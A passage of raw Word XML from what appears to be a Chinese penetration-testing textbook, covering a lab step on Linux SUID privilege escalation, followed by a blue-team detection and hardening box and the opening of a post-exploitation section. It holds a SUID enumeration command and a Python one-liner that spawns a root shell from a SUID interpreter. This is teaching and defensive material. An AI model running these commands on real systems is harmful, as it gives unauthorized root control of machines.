        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等低权限用户运行，对系统核心文件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）无读写权限。权限提升是从“有限访问”到“完全控制系统”的必经步骤。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">实操命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># === 在 www-data 的 Shell 中 ===</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 1. 枚举 SUID 二进制文件</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-perm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-4000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null ②</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 2. 分析输出中是否存在异常或可利用的 SUID 文件。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 以 GTFO Bins (https://gtfobins.github.io) 为对照，检查文件是否在其列表内。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 示例（教学案例，非精确武器化，需检查实际提权方式③）：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 若发现 /usr/bin/python3 具有 SUID 位，执行：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># /usr/bin/python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># - 该命令启动一个 shell，并保留 euid=0，从而获得 root 权限②。</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 3. 验证提权结果</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 应返回 uid=0(root) 或 euid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -perm -4000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的输出可能包含常见的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）——这些通常安全。重点关注列表中的编辑器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">vim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、脚本解释器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">perl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、文件查看工具（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">less</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、wget/curl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">成功</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出中的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">euid=0(root)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是关键标志。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">常见报错与排错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出过多“Permission</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">denied”信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;/dev/null</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会抑制所有错误输出。若无权限扫描某些目录（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），属于正常现象。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用无效：确认漏洞确实存在（如在目标系统的特定版本中，GTFO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bins </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">上的利用方法可能已修复）；在提权前务必创建虚拟机快照（见下文安全提示）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">⚠️ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：内核提权</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能导致系统不稳定甚至崩溃。在靶机上执行提权操作前，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">务必在虚拟机管理器中创建快照（Snapshot）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，以便失败后回滚。不要在生产环境或未授权的系统上测试提权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">【防御对照框</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> · </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤八】</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测与修复</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测（HIDS/EDR）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：监控非预期</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件的创建，以及低权限用户执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">二进制并随即派生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的进程树。例如，若进程链中出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data → /usr/bin/python3 → /bin/sh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">euid=0，这是典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提权行为。可用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Auditd（Linux</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">审计子系统）记录所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行行为（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节日志工程）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将进程创建日志（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">execve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">系统调用审计）与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1068（Exploitation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> for Privilege </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Escalation）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">T1548.001（Setuid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Setgid）关联（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; -</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复（加固）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; a)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">严控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">位</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：定期审计系统中所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID/SGID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，移除所有非必要的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">位（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod -s &lt;file&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。用配置管理工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ansible/Puppet）强制执行基线②。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; b)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NoNewPrivileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务单元中设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NoNewPrivileges=yes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，阻止该服务及其子进程通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等机制获得新权限。Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器（Apache/nginx）的服务单元应优先设置此选项①。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; c)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Seccomp/AppArmor/SELinux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用强制访问控制（MAC）系统限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程能执行的系统调用和能访问的文件路径。即使进程获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SUID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">权限，MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">策略仍可阻止其执行非预期操作（见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节加固清单）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="396"/>
    <w:bookmarkStart w:id="397" w:name="步骤九后渗透与持久化检测视角"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">22.1.11 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">步骤九：后渗透与持久化（检测视角）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">原理回指</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：后渗透操作（密码哈希提取、持久化、横向移动）的方法论见第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章（后渗透与横向移动）。本节从检测视角反向操作——执行这些动作的目的，是让读者在蓝队环境中（Splunk/Wazuh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等</w:t>
      </w:r>
      <w:r>
